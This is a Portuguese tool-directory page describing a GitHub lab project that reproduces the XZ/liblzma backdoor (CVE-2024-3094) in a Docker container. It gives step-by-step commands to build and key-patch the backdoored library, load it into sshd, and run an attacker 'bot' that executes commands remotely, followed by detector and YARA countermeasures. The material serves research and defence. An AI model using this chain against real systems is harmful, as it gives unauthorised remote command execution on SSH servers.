Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
cve-2024-3094 — Uma vulnerabilidade de backdoor XZ explicada em detalhes. | Kitploit
Ferramentas/GitHubGitHub/valeriot30/cve-2024-3094
Análise de VulnerabilidadesExploraçãoAnálise de MalwareAnálise de BináriosAprendizado e EducaçãoLabs e Prática
GitHubvaleriot30/cve-2024-3094

cve-2024-3094

Uma vulnerabilidade de backdoor XZ explicada em detalhes.

Ver Repositório
11há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

🛡️ Projeto de Cibersegurança: Analisando o Backdoor XZ no liblzma

📄 Visão Geral

Este projeto analisa o backdoor de alto perfil descoberto no xz-utils (liblzma), afetando as versões 5.6.0 e 5.6.1. O código malicioso introduzido no sistema de build upstream tinha como alvo a autenticação SSH, modificando como o sshd interage com a biblioteca de compressão LZMA em tempo de execução.

⚠️ Este projeto é apenas para fins de pesquisa educacional e defensiva.

Máquina vulnerável

Clone este repositório

root@kitploit:~
git clone https://github.com/valeriot30/cve-2024-3094

Navegue até o diretório

root@kitploit:~
cd cve-2024-3094

Inicie o contêiner docker

root@kitploit:~
docker build -t fedora-dev .
docker run --privileged -it --rm -p 2222:22 fedora-dev

Obtenha uma versão maliciosa da biblioteca

root@kitploit:~
cd ~  
git clone https://github.com/thesamesam/xz-archive.git  
cd xz-archive/5.6/ # The vulnerable version ( it works as well with 5.6.1 )  
tar xzf xz-5.6.0.tar.gz  
mv xz-5.6.0 ~

Exporte o alvo de build

root@kitploit:~
export RPM_ARCH=$(uname -m)

Compile a biblioteca maliciosa

root@kitploit:~
cd ~
 cd ./xz-5.6.0/  
./configure
make -j 8

Copie o SO malicioso para fora:

root@kitploit:~
cp ./src/liblzma/.libs/liblzma.so.5.6.0 ~

Clone novamente o repositório dentro do contêiner

root@kitploit:~
git clone https://github.com/valeriot30/cve-2024-3094

Aplique o patch na biblioteca liblzma com uma chave personalizada

root@kitploit:~
 python3 cve-2024-3094/patch.py liblzma.so.5.6.0

Vincule a biblioteca maliciosa no sistema

root@kitploit:~
 sh cve-2024-3094/inject.sh

Execute o sshd vinculado à biblioteca maliciosa

root@kitploit:~
 env -i LANG=C /usr/sbin/sshd -D &

Máquina do atacante

Clone este repositório

root@kitploit:~
git clone https://github.com/valeriot30/cve-2024-3094

Navegue até o diretório

root@kitploit:~
cd cve-2024-3094

Compile a ferramenta GO

root@kitploit:~
go build

Use a ferramenta inserindo o endereço IP da máquina vulnerável e o comando a ser executado

root@kitploit:~
./bot -addr 127.0.0.2:2222 -cmd 'sleep 60'

Contramedidas

Usando o detector

Execute o detector

root@kitploit:~
sh detector.sh

Usando Yara

Use as regras de correspondência do yara

root@kitploit:~
yara rule.yar ../liblzma.so.5.6.0 -s
Baixar ferramenta